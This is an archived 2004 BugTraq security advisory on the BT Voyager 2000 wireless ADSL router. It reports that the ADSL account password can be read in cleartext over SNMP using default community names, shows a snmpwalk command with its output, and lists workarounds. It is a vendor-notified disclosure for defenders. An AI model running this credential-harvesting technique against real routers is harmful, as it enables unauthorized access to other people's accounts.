BugTraq
Wireless Modem (BT Voyager 2000 Wireless ADSL Router cleartext password) Jun 22 2004 06:47AM
Konstantin V. Gavrilenko (mlists arhont com)
Arhont Ltd. - Information Security

Arhont Advisory by: Konstantin Gavrilenko (http://www.arhont.com)
Advisory: cleartext account password obtainable using SNMP
Class: design/configuration bug
Test platform: BT Voyager 2000 Wireless ADSL Router
Vendor Contact Date: 10/06/2004
PD* release date: 22/06/2004

DETAILS:

It is possible to obtain the ADSL account password from the wireless
side of the mentioned router. Provided the attacker can associate to the
router, he/she can grab SNMP strings from the router using default
public/private community name.

Furthermore, the information provided with public and private community
name are identical, differing only in that with private you can
obviously change the SNMP strings.

e.g.
root@abyrvalg:~# snmpwalk -v 1 -c public 192.168.1.1
SNMPv2-MIB::sysDescr.0 = STRING: BT Voyager 2000 Wireless ADSL Router
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.2535.111.6
SNMPv2-MIB::sysUpTime.0 = Timeticks: (260430184) 30 days, 1:02:01.84
[snip]
SNMPv2-SMI::transmission.23.2.3.1.5.5.1 = STRING:
"name.surname (at) btbroadband (dot) com [email concealed]"
SNMPv2-SMI::transmission.23.2.3.1.5.6.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.7.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.8.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.9.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.10.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.11.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.12.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.2 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.3 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.4 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.5 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.6 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.7 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.8 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.5.1 = STRING: "password"
[snip]

Risk Factor: High/Medium

Workarounds:
- Disallow anonymous access to the wireless router
- Change default SNMP community names
- Disable SNMP support

*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer 7 days before
releasing them to the public domains (such as CERT, BUGTRAQ, OSVDB).

If you would like to get more information about this issue, please do
not hesitate to contact Arhont team.

--
Respectfully,
Konstantin V. Gavrilenko

Arhont Ltd - Information Security

web: http://www.arhont.com
http://www.wi-foo.com
e-mail: k.gavrilenko (at) arhont (dot) com [email concealed]

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0x4F3608F7
PGP: Server - keyserver.pgp.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus